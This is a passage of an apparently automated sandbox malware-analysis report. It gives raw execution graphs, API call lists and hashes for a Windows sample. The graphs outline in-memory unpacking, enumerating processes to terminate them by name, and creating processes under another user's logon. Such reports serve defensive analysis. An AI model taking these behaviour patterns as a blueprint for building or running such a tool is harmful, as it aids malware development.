                                                                                                                  • Instruction Fuzzy Hash: A4717E30518B888FDB69EF18C446BAAB7E0FB99314F544A5EE48DC3211DB74E5C1CB82
                                                                                                                  APIs
                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 027428B0
                                                                                                                  • _CreateFrameInfo.LIBVCRUNTIME ref: 027428D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                  • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                  • Instruction ID: d0619b691f086f5202510b79506c5bb1ae8d00ae0f0527e337938a150c0fc311
                                                                                                                  • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                  • Instruction Fuzzy Hash: 325161B0618B488FD765EF28C48976A77E1FB89351F10055EE98EC7261DB30E942CF86

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:59.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:11
                                                                                                                  Total number of Limit Nodes:1
                                                                                                                  execution_graph 89 2bd0650 90 2bd0665 89->90 95 2bd0620 VirtualAlloc 90->95 92 2bd06d0 96 2bd01b0 VirtualAlloc 92->96 95->92 97 2bd023b VirtualProtect 96->97 99 2bd0321 VirtualFree 97->99 102 2bd030c 97->102 100 2bd0347 VirtualFree VirtualAlloc 99->100 100->102 101 2bd0531 102->101 103 2bd04f9 VirtualProtect 102->103 103->102

                                                                                                                  Callgraph

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2954668090.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_2bd0000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocFreeProtect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 267585107-0
                                                                                                                  • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                  • Instruction ID: 4abe9f3599fa4d5f3ac6de6fd51bb5e5653cfe7ea233a6892130af3a1cb51cbd
                                                                                                                  • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                  • Instruction Fuzzy Hash: CBC1BA3421CA488FD784EF5CC498B6AB7E1FB98315F51589DF48AC7261DBB4E881CB06

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 34 2bd0620-2bd0644 VirtualAlloc
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2954668090.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_2bd0000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                  • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                                                                                                  • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                  • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:8%
                                                                                                                  Total number of Nodes:1742
                                                                                                                  Total number of Limit Nodes:8
                                                                                                                  execution_graph 11059 7ff64b9389d9 11060 7ff64b938a13 CloseHandle 11059->11060 11065 7ff64b93860e 11060->11065 11061 7ff64b938669 Process32Next 11062 7ff64b93867d GetLastError 11061->11062 11061->11065 11062->11065 11063 7ff64b938ca5 CloseHandle 11064 7ff64b938cb5 11063->11064 11065->11060 11065->11061 11065->11063 11066 7ff64b93a1f1 11 API calls 11065->11066 11067 7ff64b9388cd OpenProcess 11065->11067 11073 7ff64b938153 31 API calls 11065->11073 11074 7ff64b9314e2 6 API calls 11065->11074 11066->11065 11068 7ff64b938a78 GetLastError 11067->11068 11069 7ff64b9388ee QueryFullProcessImageNameW 11067->11069 11071 7ff64b9314e2 6 API calls 11068->11071 11069->11065 11070 7ff64b93892e GetLastError 11069->11070 11072 7ff64b9314e2 6 API calls 11070->11072 11071->11065 11072->11065 11073->11065 11074->11065 11075 7ff64b9405d9 SetUnhandledExceptionFilter 11076 7ff64b93add8 11077 7ff64b93ae3e 11076->11077 11078 7ff64b93adf3 11076->11078 11078->11077 11079 7ff64b93ae0d EnterCriticalSection LeaveCriticalSection 11078->11079 11079->11077 10653 7ff64b9402d7 10654 7ff64b9402f6 10653->10654 10655 7ff64b9402fd ___lc_codepage_func ___mb_cur_max_func 10653->10655 10654->10655 10656 7ff64b940358 10655->10656 10657 7ff64b940318 10655->10657 10657->10656 10658 7ff64b940323 10657->10658 10661 7ff64b940361 10657->10661 10658->10656 10660 7ff64b940150 4 API calls 10658->10660 10659 7ff64b940150 4 API calls 10659->10661 10660->10658 10661->10656 10661->10659 9649 7ff64b93dcdd strerror 9656 7ff64b93cfc8 9649->9656 9657 7ff64b93cfd8 9656->9657 9658 7ff64b93cff6 strlen 9657->9658 9659 7ff64b93cfef 9657->9659 9658->9659 10231 7ff64b93c3dc 10232 7ff64b93b3e7 fputc 10231->10232 10235 7ff64b93c382 10232->10235 10233 7ff64b93ca67 10234 7ff64b93b3e7 fputc 10234->10235 10235->10233 10235->10234 10236 7ff64b93b9b0 fputc 10235->10236 10237 7ff64b93bbb4 fputc 10235->10237 10236->10235 10237->10235 10248 7ff64b93a3e1 10249 7ff64b93a3f9 10248->10249 10250 7ff64b93a43e 10248->10250 10251 7ff64b93a46e 10249->10251 10252 7ff64b93a3fe 10249->10252 10253 7ff64b9314e2 6 API calls 10250->10253 10254 7ff64b9314e2 6 API calls 10251->10254 10255 7ff64b939ed0 8 API calls 10252->10255 10260 7ff64b93a41b 10253->10260 10254->10260 10256 7ff64b93a411 10255->10256 10257 7ff64b93a4a1 strlen GetProcessHeap HeapAlloc 10256->10257 10256->10260 10258 7ff64b93a52d 10257->10258 10259 7ff64b93a4d3 10257->10259 10262 7ff64b9314e2 6 API calls 10258->10262 10259->10260 10261 7ff64b93a4db strlen 10259->10261 10266 7ff64b936e61 10261->10266 10262->10259 10265 7ff64b93a511 GetProcessHeap HeapFree 10265->10260 10267 7ff64b936e71 10266->10267 10268 7ff64b936e93 10266->10268 10269 7ff64b936ec6 10267->10269 10270 7ff64b936e76 10267->10270 10271 7ff64b9314e2 6 API calls 10268->10271 10274 7ff64b9314e2 6 API calls 10269->10274 10272 7ff64b936ef9 10270->10272 10273 7ff64b936e7c 10270->10273 10277 7ff64b936e85 10271->10277 10275 7ff64b9314e2 6 API calls 10272->10275 10276 7ff64b9314e2 6 API calls 10273->10276 10273->10277 10274->10277 10275->10277 10276->10277 10277->10260 10277->10265 10278 7ff64b93afe1 strlen 10279 7ff64b93b043 10278->10279 10281 7ff64b93aff9 10278->10281 10280 7ff64b93b026 strncmp 10280->10279 10280->10281 10281->10279 10281->10280 10672 7ff64b9406e1 FreeLibrary 11096 7ff64b9365e3 11097 7ff64b9365f9 11096->11097 11098 7ff64b936684 11096->11098 11099 7ff64b9366b4 11097->11099 11100 7ff64b936602 11097->11100 11101 7ff64b9314e2 6 API calls 11098->11101 11102 7ff64b9314e2 6 API calls 11099->11102 11103 7ff64b93660e strlen 11100->11103 11104 7ff64b9366e4 11100->11104 11110 7ff64b9366ad 11101->11110 11102->11110 11106 7ff64b936620 11103->11106 11103->11110 11105 7ff64b9314e2 6 API calls 11104->11105 11105->11110 11107 7ff64b936640 strlen 11106->11107 11108 7ff64b93662f strlen 11106->11108 11115 7ff64b93743a 11107->11115 11108->11107 11113 7ff64b9314e2 6 API calls 11110->11113 11111 7ff64b936656 strlen 11112 7ff64b9314e2 6 API calls 11111->11112 11114 7ff64b93667a 11112->11114 11113->11114 11116 7ff64b937456 11115->11116 11116->11111 11117 7ff64b9405e9 RemoveDirectoryA 10282 7ff64b93c7ec 10283 7ff64b93c382 10282->10283 10284 7ff64b93ca67 10283->10284 10285 7ff64b93b3e7 fputc 10283->10285 10286 7ff64b93b9b0 fputc 10283->10286 10287 7ff64b93bbb4 fputc 10283->10287 10285->10283 10286->10283 10287->10283 10288 7ff64b93c3f0 10289 7ff64b93c417 10288->10289 10290 7ff64b93c423 10288->10290 10292 7ff64b93b420 5 API calls 10289->10292 10294 7ff64b93c382 10289->10294 10298 7ff64b93b4fe 10290->10298 10292->10294 10293 7ff64b93ca67 10294->10293 10295 7ff64b93b3e7 fputc 10294->10295 10296 7ff64b93b9b0 fputc 10294->10296 10297 7ff64b93bbb4 fputc 10294->10297 10295->10294 10296->10294 10297->10294 10299 7ff64b93b516 10298->10299 10300 7ff64b93b523 10299->10300 10301 7ff64b93b3e7 fputc 10299->10301 10302 7ff64b93b3e7 fputc 10300->10302 10303 7ff64b93b56e 10300->10303 10301->10299 10302->10300 10304 7ff64b93b58a 10303->10304 10305 7ff64b93b3e7 fputc 10303->10305 10304->10289 10305->10303 9689 7ff64b93e0ee 9692 7ff64b93db86 9689->9692 9690 7ff64b93dcdd strerror 9693 7ff64b93cfc8 strlen 9690->9693 9691 7ff64b93e2e0 9694 7ff64b93e301 9691->9694 9697 7ff64b93ccd9 9691->9697 9692->9690 9692->9691 9696 7ff64b93ccd9 fputwc fwprintf 9692->9696 9693->9692 9696->9692 9698 7ff64b93ccf1 9697->9698 9699 7ff64b93cd06 9698->9699 9701 7ff64b93cd53 9698->9701 9700 7ff64b93cd2a fwprintf 9699->9700 9705 7ff64b93cd31 9699->9705 9700->9705 9704 7ff64b93cd58 9701->9704 9708 7ff64b93ca90 9701->9708 9703 7ff64b93cdab 9703->9705 9707 7ff64b93ca90 fputwc 9703->9707 9704->9703 9706 7ff64b93ca90 fputwc 9704->9706 9705->9694 9706->9704 9707->9703 9709 7ff64b93caa1 9708->9709 9710 7ff64b93cabc 9709->9710 9711 7ff64b93cab2 fputwc 9709->9711 9710->9701 9711->9710 9712 7ff64b93c4b9 9717 7ff64b93c382 9712->9717 9713 7ff64b93b9b0 fputc 9713->9717 9714 7ff64b93bbb4 fputc 9714->9717 9715 7ff64b93ca67 9716 7ff64b93b3e7 fputc 9716->9717 9717->9712 9717->9713 9717->9714 9717->9715 9717->9716 10315 7ff64b931bbb 10316 7ff64b931bf4 10315->10316 10318 7ff64b931bcc 10315->10318 10317 7ff64b9314e2 6 API calls 10316->10317 10319 7ff64b931bd1 10317->10319 10318->10319 10320 7ff64b9314e2 6 API calls 10318->10320 10320->10319 10321 7ff64b9337c0 10322 7ff64b931cf4 8 API calls 10321->10322 10323 7ff64b9337d0 10322->10323 10324 7ff64b931c73 8 API calls 10323->10324 10330 7ff64b933816 10323->10330 10325 7ff64b9337e4 10324->10325 10326 7ff64b9337fc 10325->10326 10327 7ff64b933820 GetLastError 10325->10327 10325->10330 10329 7ff64b9314e2 6 API calls 10326->10329 10328 7ff64b9314e2 6 API calls 10327->10328 10328->10330 10329->10330 11134 7ff64b935dc4 11135 7ff64b935de5 11134->11135 11136 7ff64b935deb CloseHandle 11135->11136 11137 7ff64b935df4 11135->11137 11136->11137 10690 7ff64b93a6d0 10691 7ff64b93a6f7 10690->10691 10692 7ff64b93a763 fprintf 10691->10692 11148 7ff64b93c5cf 11149 7ff64b93c5e5 11148->11149 11156 7ff64b93b919 11149->11156 11151 7ff64b93ca67 11152 7ff64b93b3e7 fputc 11153 7ff64b93c382 11152->11153 11153->11151 11153->11152 11154 7ff64b93b9b0 fputc 11153->11154 11155 7ff64b93bbb4 fputc 11153->11155 11154->11153 11155->11153 11157 7ff64b93b92a 11156->11157 11167 7ff64b93b2d0 11157->11167 11160 7ff64b93b979 11175 7ff64b93b721 11160->11175 11161 7ff64b93b96c 11171 7ff64b93b5da 11161->11171 11164 7ff64b93b984 11165 7ff64b93b3e7 fputc 11164->11165 11166 7ff64b93b977 11164->11166 11165->11164 11166->11153 11168 7ff64b93b2ee 11167->11168 11169 7ff64b93e4e0 6 API calls 11168->11169 11170 7ff64b93b3e1 11169->11170 11170->11160 11170->11161 11172 7ff64b93b5f0 11171->11172 11173 7ff64b93b4fe fputc 11172->11173 11174 7ff64b93b646 11173->11174 11174->11166 11178 7ff64b93b73d 11175->11178 11176 7ff64b93b78e 11177 7ff64b93b3e7 fputc 11176->11177 11183 7ff64b93b82b 11176->11183 11177->11183 11178->11176 11180 7ff64b93b3e7 fputc 11178->11180 11179 7ff64b93b831 11181 7ff64b93b867 11179->11181 11182 7ff64b93b83a 11179->11182 11180->11178 11186 7ff64b93b3e7 fputc 11181->11186 11187 7ff64b93b8bc 11181->11187 11191 7ff64b93b420 5 API calls 11181->11191 11184 7ff64b93b3e7 fputc 11182->11184 11183->11179 11185 7ff64b93b3e7 fputc 11183->11185 11184->11187 11185->11183 11186->11181 11194 7ff64b93b8d0 11187->11194 11195 7ff64b93b64c 11187->11195 11189 7ff64b93b8e8 11190 7ff64b93b910 11189->11190 11193 7ff64b93b3e7 fputc 11189->11193 11190->11164 11191->11181 11192 7ff64b93b3e7 fputc 11192->11194 11193->11189 11194->11189 11194->11192 11196 7ff64b93b666 11195->11196 11197 7ff64b93b68f 11195->11197 11201 7ff64b94026c 6 API calls 11196->11201 11198 7ff64b93b6a7 11197->11198 11199 7ff64b93b706 11197->11199 11202 7ff64b940047 4 API calls 11198->11202 11200 7ff64b93b3e7 fputc 11199->11200 11208 7ff64b93b6f2 11200->11208 11201->11197 11203 7ff64b93b6d5 11202->11203 11204 7ff64b93b6dc 11203->11204 11205 7ff64b93b6f4 11203->11205 11207 7ff64b93b3e7 fputc 11204->11207 11204->11208 11206 7ff64b93b3e7 fputc 11205->11206 11206->11208 11207->11204 11208->11194 10349 7ff64b936fd5 10350 7ff64b936feb GetSystemTimeAsFileTime 10349->10350 10351 7ff64b936fe0 10349->10351 10350->10351 11218 7ff64b940619 MultiByteToWideChar 11219 7ff64b931a19 11220 7ff64b931b02 11219->11220 11221 7ff64b931a32 11219->11221 11224 7ff64b9314e2 6 API calls 11220->11224 11222 7ff64b931b2d 11221->11222 11223 7ff64b931a3b FindResourceA 11221->11223 11227 7ff64b9314e2 6 API calls 11222->11227 11225 7ff64b931b58 GetLastError 11223->11225 11226 7ff64b931a58 LoadResource 11223->11226 11234 7ff64b931af2 11224->11234 11228 7ff64b9314e2 6 API calls 11225->11228 11229 7ff64b931b86 GetLastError GetLastError 11226->11229 11230 7ff64b931a70 11226->11230 11227->11234 11233 7ff64b931b79 11228->11233 11231 7ff64b9314e2 6 API calls 11229->11231 11232 7ff64b9314e2 6 API calls 11230->11232 11231->11234 11232->11234 11233->11229 11233->11234 10352 7ff64b93341c 10353 7ff64b9334ad 10352->10353 10354 7ff64b93342e GetExitCodeProcess 10352->10354 10357 7ff64b9314e2 6 API calls 10353->10357 10355 7ff64b93350f GetLastError 10354->10355 10356 7ff64b933444 10354->10356 10359 7ff64b9314e2 6 API calls 10355->10359 10358 7ff64b933452 WaitForSingleObject GetExitCodeProcess 10356->10358 10362 7ff64b9334d6 10356->10362 10364 7ff64b9335f9 TerminateProcess 10356->10364 10357->10362 10360 7ff64b933476 10358->10360 10361 7ff64b9336f1 GetLastError 10358->10361 10359->10362 10374 7ff64b9333c0 10360->10374 10365 7ff64b9314e2 6 API calls 10361->10365 10366 7ff64b9337ac 10362->10366 10369 7ff64b9314e2 6 API calls 10362->10369 10364->10358 10368 7ff64b93360a GetLastError 10364->10368 10365->10362 10371 7ff64b9314e2 6 API calls 10368->10371 10373 7ff64b9334ab 10369->10373 10370 7ff64b933484 10372 7ff64b9314e2 6 API calls 10370->10372 10371->10356 10372->10373 10375 7ff64b9333ec 10374->10375 10376 7ff64b9333ce CloseHandle CloseHandle 10374->10376 10378 7ff64b9314e2 6 API calls 10375->10378 10377 7ff64b9333e5 10376->10377 10377->10362 10377->10370 10378->10377 9731 7ff64b93c51b 9732 7ff64b93c52d 9731->9732 9733 7ff64b93bbb4 fputc 9732->9733 9736 7ff64b93c382 9733->9736 9734 7ff64b93ca67 9735 7ff64b93b3e7 fputc 9735->9736 9736->9734 9736->9735 9737 7ff64b93b9b0 fputc 9736->9737 9738 7ff64b93bbb4 fputc 9736->9738 9737->9736 9738->9736 10715 7ff64b93131a 10716 7ff64b931131 154 API calls 10715->10716 10717 7ff64b93132e 10716->10717 10379 7ff64b93181b 10380 7ff64b9317b9 10379->10380 10381 7ff64b9314e2 6 API calls 10380->10381 10382 7ff64b9317d6 10381->10382 10718 7ff64b940721 DeleteCriticalSection 10719 7ff64b93ff1f GetModuleHandleW GetProcAddress 10720 7ff64b93ff4c LoadLibraryW GetProcAddress 10719->10720 10721 7ff64b93ff73 10719->10721 10720->10721 11235 7ff64b933222 11236 7ff64b93325c 11235->11236 11237 7ff64b933230 WaitForSingleObject 11235->11237 11239 7ff64b9314e2 6 API calls 11236->11239 11238 7ff64b93328c GetLastError 11237->11238 11241 7ff64b933240 11237->11241 11240 7ff64b9314e2 6 API calls 11238->11240 11239->11241 11240->11241 9747 7ff64b935923 9748 7ff64b935936 9747->9748 9749 7ff64b9359d4 9747->9749 9751 7ff64b93593f CreateFileA 9748->9751 9752 7ff64b935a04 9748->9752 9750 7ff64b9314e2 6 API calls 9749->9750 9758 7ff64b9359b4 9750->9758 9754 7ff64b93597c GetFileSize 9751->9754 9755 7ff64b935a34 GetLastError 9751->9755 9753 7ff64b9314e2 6 API calls 9752->9753 9753->9758 9756 7ff64b935afa GetLastError 9754->9756 9759 7ff64b93599b 9754->9759 9755->9759 9756->9759 9757 7ff64b9359ab CloseHandle 9757->9758 9759->9757 9759->9758 11250 7ff64b93de28 11251 7ff64b93de3e 11250->11251 11260 7ff64b93d126 11251->11260 11253 7ff64b93e2e0 11254 7ff64b93e301 11253->11254 11255 7ff64b93ccd9 2 API calls 11253->11255 11255->11254 11256 7ff64b93ccd9 fputwc fwprintf 11257 7ff64b93db86 11256->11257 11257->11253 11257->11256 11258 7ff64b93dcdd strerror 11257->11258 11259 7ff64b93cfc8 strlen 11258->11259 11259->11257 11261 7ff64b93d137 11260->11261 11262 7ff64b93d00f 6 API calls 11261->11262 11263 7ff64b93d164 11262->11263 11264 7ff64b93d179 11263->11264 11265 7ff64b93d186 11263->11265 11267 7ff64b93cc00 10 API calls 11264->11267 11266 7ff64b93cdd0 9 API calls 11265->11266 11269 7ff64b93d191 11266->11269 11268 7ff64b93d184 11267->11268 11268->11257 11269->11268 11270 7ff64b93ca90 fputwc 11269->11270 11270->11269 10394 7ff64b93ac27 10395 7ff64b93ac4e 10394->10395 10396 7ff64b93ac6f 10395->10396 10397 7ff64b93acdf signal 10395->10397 10398 7ff64b93acb5 10395->10398 10397->10396 10397->10398 10398->10396 10399 7ff64b93acfb signal 10398->10399 10399->10396 11271 7ff64b93f626 11272 7ff64b93f65d 11271->11272 11273 7ff64b93f63b DeleteCriticalSection 11271->11273 11273->11272 11274 7ff64b93c631 11275 7ff64b93c64d 11274->11275 11277 7ff64b93c6c3 11275->11277 11278 7ff64b93c6c8 11275->11278 11276 7ff64b93b5da fputc 11282 7ff64b93c382 11276->11282 11277->11276 11285 7ff64b93bdaf 11278->11285 11280 7ff64b93ca67 11281 7ff64b93b3e7 fputc 11281->11282 11282->11280 11282->11281 11283 7ff64b93b9b0 fputc 11282->11283 11284 7ff64b93bbb4 fputc 11282->11284 11283->11282 11284->11282 11290 7ff64b93bdc6 11285->11290 11286 7ff64b93bf9d 11289 7ff64b93b3e7 fputc 11286->11289 11287 7ff64b93bf5e 11287->11286 11288 7ff64b93b3e7 fputc 11287->11288 11288->11286 11291 7ff64b93bfaa 11289->11291 11290->11287 11294 7ff64b93b3e7 fputc 11290->11294 11292 7ff64b93b3e7 fputc 11291->11292 11293 7ff64b93bfbb 11292->11293 11295 7ff64b93b3e7 fputc 11293->11295 11304 7ff64b93bfc1 11293->11304 11294->11290 11295->11293 11296 7ff64b93c008 11297 7ff64b93c054 11296->11297 11299 7ff64b93b3e7 fputc 11296->11299 11300 7ff64b93b3e7 fputc 11297->11300 11298 7ff64b93b64c 11 API calls 11298->11304 11299->11296 11302 7ff64b93c068 11300->11302 11301 7ff64b93b3e7 fputc 11301->11304 11303 7ff64b93b420 5 API calls 11303->11304 11304->11296 11304->11298 11304->11301 11304->11303 9760 7ff64b93292e 9761 7ff64b932944 9760->9761 9762 7ff64b93299e 9761->9762 9763 7ff64b932a53 9761->9763 9765 7ff64b932a87 9762->9765 9766 7ff64b9329a7 9762->9766 9764 7ff64b9314e2 6 API calls 9763->9764 9775 7ff64b9329d5 9764->9775 9767 7ff64b9314e2 6 API calls 9765->9767 9768 7ff64b9329bd strlen 9766->9768 9769 7ff64b932abb 9766->9769 9767->9775 9770 7ff64b932aef strcat 9768->9770 9768->9775 9771 7ff64b9314e2 6 API calls 9769->9771 9772 7ff64b932b08 strlen strlen 9770->9772 9773 7ff64b932bec 9770->9773 9771->9775 9774 7ff64b932b38 strlen strcat 9772->9774 9772->9775 9773->9775 9778 7ff64b932c1a 9773->9778 9795 7ff64b933032 9773->9795 9776 7ff64b932b74 9774->9776 9779 7ff64b9331b1 9775->9779 9783 7ff64b9314e2 6 API calls 9775->9783 9776->9773 9777 7ff64b932b95 strlen strlen 9776->9777 9777->9773 9780 7ff64b932bbc strlen strcat 9777->9780 9781 7ff64b932c32 LogonUserA 9778->9781 9796 7ff64b932ce5 9778->9796 9780->9776 9784 7ff64b932d9d CreateProcessAsUserA 9781->9784 9785 7ff64b932c63 GetLastError 9781->9785 9782 7ff64b933041 CreateProcessA 9786 7ff64b933098 GetLastError 9782->9786 9787 7ff64b933191 9782->9787 9801 7ff64b932a3c 9783->9801 9791 7ff64b932dfc GetLastError 9784->9791 9792 7ff64b932eed 9784->9792 9789 7ff64b9314e2 6 API calls 9785->9789 9790 7ff64b9314e2 6 API calls 9786->9790 9788 7ff64b9314e2 6 API calls 9787->9788 9788->9779 9789->9778 9790->9795 9793 7ff64b9314e2 6 API calls 9791->9793 9794 7ff64b9314e2 6 API calls 9792->9794 9793->9796 9794->9796 9795->9775 9795->9782 9797 7ff64b932f27 CloseHandle 9796->9797 9798 7ff64b932f2d 9796->9798 9797->9798 9798->9775 9799 7ff64b932f36 9798->9799 9799->9779 9800 7ff64b9314e2 6 API calls 9799->9800 9800->9801 10407 7ff64b93dc2f 10408 7ff64b93dc56 10407->10408 10409 7ff64b93dc62 10407->10409 10411 7ff64b93ccd9 2 API calls 10408->10411 10415 7ff64b93db86 10408->10415 10419 7ff64b93cacd 10409->10419 10411->10415 10412 7ff64b93e2e0 10413 7ff64b93e301 10412->10413 10414 7ff64b93ccd9 2 API calls 10412->10414 10414->10413 10415->10412 10416 7ff64b93ccd9 fputwc fwprintf 10415->10416 10417 7ff64b93dcdd strerror 10415->10417 10416->10415 10418 7ff64b93cfc8 strlen 10417->10418 10418->10415 10420 7ff64b93cae7 10419->10420 10421 7ff64b93cafc 10420->10421 10426 7ff64b93cb4c 10420->10426 10422 7ff64b93cb27 fwprintf 10421->10422 10423 7ff64b93cb04 fwprintf 10421->10423 10425 7ff64b93cb39 10422->10425 10423->10425 10425->10408 10429 7ff64b93ca90 fputwc 10426->10429 10431 7ff64b93cb51 10426->10431 10427 7ff64b93cbd9 10427->10425 10432 7ff64b93ca90 fputwc 10427->10432 10428 7ff64b93cb8f strlen 10434 7ff64b94026c 10428->10434 10429->10426 10431->10427 10431->10428 10433 7ff64b93ca90 fputwc 10431->10433 10432->10427 10433->10431 10435 7ff64b94027d 10434->10435 10436 7ff64b940282 ___mb_cur_max_func ___lc_codepage_func 10434->10436 10435->10436 10437 7ff64b9402bb 10436->10437 10440 7ff64b940150 10437->10440 10441 7ff64b940170 10440->10441 10443 7ff64b94018c 10440->10443 10442 7ff64b940254 10441->10442 10441->10443 10445 7ff64b9401df IsDBCSLeadByteEx 10441->10445 10446 7ff64b9401aa 10441->10446 10442->10443 10444 7ff64b94021f MultiByteToWideChar 10442->10444 10443->10431 10444->10443 10447 7ff64b940244 _errno 10444->10447 10445->10442 10445->10446 10446->10443 10448 7ff64b9401c6 MultiByteToWideChar 10446->10448 10447->10443 10448->10443 10448->10447 9802 7ff64b93212f 9803 7ff64b932159 CreateToolhelp32Snapshot 9802->9803 9804 7ff64b9321b6 9802->9804 9805 7ff64b932227 GetLastError 9803->9805 9806 7ff64b932175 Process32First 9803->9806 9807 7ff64b9314e2 6 API calls 9804->9807 9808 7ff64b9314e2 6 API calls 9805->9808 9809 7ff64b9322ff GetLastError 9806->9809 9831 7ff64b9321a6 9806->9831 9818 7ff64b9321df 9807->9818 9808->9818 9810 7ff64b93230c 9809->9810 9814 7ff64b9314e2 6 API calls 9810->9814 9811 7ff64b9328a3 9824 7ff64b9314e2 6 API calls 9811->9824 9812 7ff64b9321f4 9815 7ff64b9314e2 6 API calls 9812->9815 9813 7ff64b932888 CloseHandle 9813->9811 9813->9818 9814->9831 9817 7ff64b932211 9815->9817 9818->9811 9818->9812 9819 7ff64b9324d3 OpenProcess 9822 7ff64b9324f4 TerminateProcess 9819->9822 9823 7ff64b9325a3 GetLastError 9819->9823 9820 7ff64b9324c2 strcmp 9820->9819 9820->9831 9821 7ff64b9326ed Process32Next 9826 7ff64b932704 GetLastError 9821->9826 9821->9831 9827 7ff64b93250a GetLastError 9822->9827 9828 7ff64b932484 CloseHandle 9822->9828 9825 7ff64b9314e2 6 API calls 9823->9825 9824->9817 9825->9831 9826->9831 9829 7ff64b9314e2 6 API calls 9827->9829 9828->9831 9829->9831 9830 7ff64b9314e2 6 API calls 9830->9831 9831->9813 9831->9819 9831->9820 9831->9821 9831->9828 9831->9830 10456 7ff64b93702f 10457 7ff64b937057 wcslen 10456->10457 10458 7ff64b93704b 10456->10458 10457->10458 9839 7ff64b93dcf8 9840 7ff64b93dd06 9839->9840 9841 7ff64b93dd4f 9840->9841 9842 7ff64b93dd3f 9840->9842 9860 7ff64b93d1bd 9841->9860 9852 7ff64b93d3c1 9842->9852 9845 7ff64b93e2e0 9846 7ff64b93e301 9845->9846 9847 7ff64b93ccd9 2 API calls 9845->9847 9847->9846 9848 7ff64b93ccd9 fputwc fwprintf 9849 7ff64b93db86 9848->9849 9849->9845 9849->9848 9850 7ff64b93dcdd strerror 9849->9850 9851 7ff64b93cfc8 strlen 9850->9851 9851->9849 9855 7ff64b93d3f3 9852->9855 9853 7ff64b93d593 9857 7ff64b93d5af 9853->9857 9859 7ff64b93ca90 fputwc 9853->9859 9854 7ff64b93d513 9854->9853 9856 7ff64b93ca90 fputwc 9854->9856 9855->9854 9858 7ff64b93ca90 fputwc 9855->9858 9856->9854 9857->9849 9858->9855 9859->9853 9861 7ff64b93d20f 9860->9861 9862 7ff64b93ca90 fputwc 9861->9862 9866 7ff64b93d373 9861->9866 9862->9861 9863 7ff64b93ca90 fputwc 9863->9866 9864 7ff64b93d3b3 9864->9849 9865 7ff64b93ca90 fputwc 9867 7ff64b93d38c 9865->9867 9866->9863 9866->9867 9867->9864 9867->9865 11305 7ff64b93ddf7 11306 7ff64b93de0d 11305->11306 11315 7ff64b93d93d 11306->11315 11308 7ff64b93db86 11309 7ff64b93e2e0 11308->11309 11312 7ff64b93ccd9 fputwc fwprintf 11308->11312 11313 7ff64b93dcdd strerror 11308->11313 11310 7ff64b93e301 11309->11310 11311 7ff64b93ccd9 2 API calls 11309->11311 11311->11310 11312->11308 11314 7ff64b93cfc8 strlen 11313->11314 11314->11308 11316 7ff64b93d94e 11315->11316 11317 7ff64b93d00f 6 API calls 11316->11317 11318 7ff64b93d97e 11317->11318 11319 7ff64b93d9a0 11318->11319 11320 7ff64b93d993 11318->11320 11322 7ff64b93d897 9 API calls 11319->11322 11321 7ff64b93cc00 10 API calls 11320->11321 11323 7ff64b93d99e 11321->11323 11322->11323 11323->11308 9023 7ff64b9312fd 9026 7ff64b931131 9023->9026 9027 7ff64b93115a 9026->9027 9028 7ff64b931172 9027->9028 9029 7ff64b931169 Sleep 9027->9029 9030 7ff64b931188 _amsg_exit 9028->9030 9031 7ff64b931194 9028->9031 9029->9027 9032 7ff64b9311b5 9030->9032 9031->9032 9033 7ff64b93119a _initterm 9031->9033 9034 7ff64b9311de 9032->9034 9035 7ff64b9311c5 _initterm 9032->9035 9033->9032 9047 7ff64b93a96b 9034->9047 9035->9034 9038 7ff64b93122e 9039 7ff64b931233 malloc 9038->9039 9040 7ff64b931253 9039->9040 9041 7ff64b931258 strlen malloc 9040->9041 9042 7ff64b931283 9040->9042 9041->9040 9058 7ff64b9314b8 9042->9058 9044 7ff64b9312c4 9045 7ff64b9312e8 9044->9045 9046 7ff64b9312e3 _cexit 9044->9046 9046->9045 9048 